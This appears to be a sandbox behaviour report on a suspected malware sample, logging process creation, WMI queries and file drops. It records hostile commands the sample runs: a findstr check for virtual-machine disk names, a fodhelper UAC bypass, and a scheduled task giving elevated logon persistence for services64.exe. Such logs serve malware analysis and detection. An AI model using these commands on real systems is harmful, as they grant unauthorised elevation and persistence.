Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\00513a1e-7249-4c11-a0ce-fe6099077778
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File created: C:\Users\user\AppData\Local\Temp\b.bat
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: e7WMhx18XN.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: e7WMhx18XN.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\findstr.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process (3 identical entries collapsed)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe' (89 identical entries collapsed)
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: e7WMhx18XN.exe ReversingLabs: Detection: 52%
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Users\user\Desktop\e7WMhx18XN.exe "C:\Users\user\Desktop\e7WMhx18XN.exe"
Source: unknown Process created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Process created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\paint.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
